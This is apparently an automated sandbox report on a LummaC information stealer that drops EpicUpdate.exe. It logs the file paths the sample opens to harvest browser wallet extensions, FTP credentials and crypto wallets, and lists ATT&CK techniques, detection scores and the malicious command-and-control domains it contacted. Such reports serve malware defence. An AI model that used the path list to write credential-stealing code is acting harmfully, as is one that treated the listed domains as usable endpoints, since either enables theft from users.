Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\ZGGKNSUKOP	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\UNKRLCVOHV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\HMPPSXQPQV	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\NVWZAPQSQL	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\NYMMPCEIMA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EOWRVPQCCS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	Directory queried: C:\Users\user\Documents\GRXZDKKVDB	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	331 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	22 Virtualization/Sandbox Evasion	2 OS Credential Dumping	421 Security Software Discovery	Remote Services	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	11 Input Capture	22 Virtualization/Sandbox Evasion	Remote Desktop Protocol	31 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	12 Process Injection	Security Account Manager	1 Network Service Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	Steganography	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe	58%	ReversingLabs	Win64.Trojan.CrypterX

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\EpicUpdate.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Antivirus Detection	Reputation
scratgyy.biz	104.21.64.165	true	true		unknown
www.google.com	142.251.40.100	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://scratgyy.biz/api	true		unknown
condifendteu.sbs	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://mx.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://fr.search.yahoo.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/new	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/tint/2128	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://hk.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://gameplayapi.intel.com/api/games/getagsgamesettings2/	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31846836441.000001ECC2E62000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E79000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC317F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3081000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://it.search.yahoo.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/2362	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/402	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/1393	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/1276	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/1338622.	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://presearch.com/api/suggest?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/1214923	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://suggestplugin.gmx.co.uk/s?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://ca.search.yahoo.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.givero.com/suggest?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.neti.ee/favicon.icohttp://www.neti.ee/cgi-bin/otsing?query=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/776	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://yandex.com.tr/gorsel/search?rpt=imageviewhttps://www.yandex.com.tr/chrome/newtab	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/1289	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.so.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/537	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://dk.search.yahoo.com/favicon.icohttps://dk.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://at.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/2260	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://malaysia.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.icohttps://hladaj.atlas.sk/fulltext/?p	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.conduit.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/tint.	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://vn.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.ask.com/web?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://cdn.search.brave.com/serp/favicon.icohttps://search.brave.com/search?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://ph.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.ecosia.org/newtab/	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.conduit.com/favicon.icohttp://www.conduit.com/search?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://tw.search.yahoo.com/favicon.icohttps://tw.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/341254292	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.delfi.lt/favicon.icohttps://www.delfi.lt/paieska/?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/2391	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://search.imesh.net/music?hl=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://sug.so.360.cn/suggest?encodein=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://cl.search.yahoo.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.quendu.com/suggest?query=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://yandex.kz/images/search/?rpt=imageview	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://coccoc.com/search#query=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.yandex.by/chrome/newtab	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/633	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://ph.search.yahoo.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/chromium/329702368	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/1071	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://go.mail.ru/chrome/newtab/	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://id.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://uk.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32744920207.00005C8C0339C000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.nona.de/?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://www.neti.ee/cgi-bin/otsing?query=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://petalsearch.com/search?query=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://ok.hu/gfx/favicon.icohttp://ok.hu/katalogus?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://ph.search.yahoo.com/favicon.icohttps://ph.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://oceanhero.today/web?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://gpuweb.github.io/gpuweb/#texture-compression-astc	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/newCheckIfAudioThreadIsAliveMedia.AudioThreadStatusCreating	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://ch.search.yahoo.com/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://gameplayapi.intel.com/api/games/getagsgames2/v	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31846836441.000001ECC2E81000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC3088000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://gameplayapi.intel.com/api/games/getagsgames2/u	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	false	unknown
https://presearch.com/favicon.icohttps://presearch.com/search?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32741436014.00005C8C02DA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32738330298.00005C8C02774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000002.32739685764.00005C8C02A98000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000003.00000003.32322473496.00005C8C02744000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/582	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/1083	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/343	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/dawn/342	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
http://imgs.sapo.pt/images/sapo.icohttp://pesquisa.sapo.pt/?q=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://nl.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://in.search.yahoo.com/favicon.icohttps://in.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://search.goo.ne.jp/cdn/common/img/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://crbug.com/tint/1003	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004508000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://tst-gameplayapi.intel.com/api/games/downloadthumbnail/$f3O	SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31848251825.000001ECC2E9A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31903198582.000001ECC30A1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.CrypterX-gen.14264.32283.exe, 00000000.00000003.31888277681.000001ECC3186000.00000004.00000020.00020000.00000000.sdmp	false	unknown
http://ak.apnstatic.com/media/images/favicon_search-results.icohttp://dts.search-results.com/sr?lng=	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://www.sogou.com/images/logo/old/favicon.ico	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
https://in.search.yahoo.com/search	EpicUpdate.exe, 00000002.00000003.32366887199.0000000004AD9000.00000004.00000800.00020000.00000000.sdmp	false	unknown
